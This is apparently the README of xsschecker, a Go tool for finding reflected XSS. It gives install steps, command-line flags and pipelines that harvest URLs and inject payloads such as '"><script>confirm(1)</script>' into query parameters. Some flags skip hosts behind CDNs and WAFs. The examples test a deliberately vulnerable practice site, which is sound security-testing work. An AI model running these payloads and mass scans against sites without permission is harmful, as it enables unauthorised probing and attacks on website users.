_ _ ____ ____ ___ _ _ ____ ___ __ _ ____ ____
( \/ )/ ___)/ ___) / __)/ )( \( __)/ __)( / )( __)( _ \
) ( \___ \\___ \( (__ ) __ ( ) _)( (__ ) ( ) _) ) /
(_/\_)(____/(____/ \___)\_)(_/(____)\___)(__\_)(____)(__\_)
go install github.com/rix4uni/xsschecker@latest
git clone https://github.com/rix4uni/xsschecker.git && cd xsschecker && go build xsschecker.go && mv xsschecker ~/go/bin/xsschecker && cd .. && rm -rf xsschecker
xsschecker -h
Usage: xsschecker [OPTIONS]
-H string
Custom User-Agent header for HTTP requests. (default "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36")
-ao string
File to append the output instead of overwriting.
-i string
Input file containing list of URLs.
-match string
The string(s) to match against the domain response. Separate multiple strings with commas. (required) (default "alert(1), confirm(1), prompt(1)")
-maxssc int
Maximum number of status code responses required before skipping all URLs from that domain, This flag only can be use with -ssc flag. (default 20)
Do not use colored output.
-o string
File to save the output.
-proxy string
Proxy server for HTTP requests. (e.g.,
-retries int
Number of retry attempts for failed HTTP requests. (default 1)
-scdn string
Comma-separated server names to skip all URLs for (e.g., "cloudflare,AkamaiGHost,CloudFront,Imperva").
-ssc string
Comma-separated status codes to skip all URLs from a domain if encountered (e.g., 403,400).
-t int
Number of concurrent threads. (default 20)
-timeout int
Timeout for HTTP requests in seconds. (default 15)
-u string
Single URL to test.
-v Enable verbose output for debugging purposes.
Print the version of the tool and exit.
If set, only vulnerable URLs will be printed.
cat subs.txt | waybackurls >> waybackurls-urls.txt
cat subs.txt | gau >> gau-urls.txt
cat live-subs.txt | hakrawler -scope >> hakrawler-urls.txt
cat waybackurls-urls.txt gau-urls.txt hakrawler-urls.txt | anew -q urls.txt
cat urls.txt | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>'
echo "testphp.vulnweb.com" | waybackurls | gf xss | uro | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>' -vuln
echo "testphp.vulnweb.com" | waybackurls | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>' -vuln
echo "testphp.vulnweb.com" | waybackurls | uro | gf allparam | grep "=" | gf blacklist | qsreplace '"><script>confirm(1)</script>' | xsschecker -match '"><script>confirm(1)</script>, "<image/src/onerror=confirm(1)>' -vuln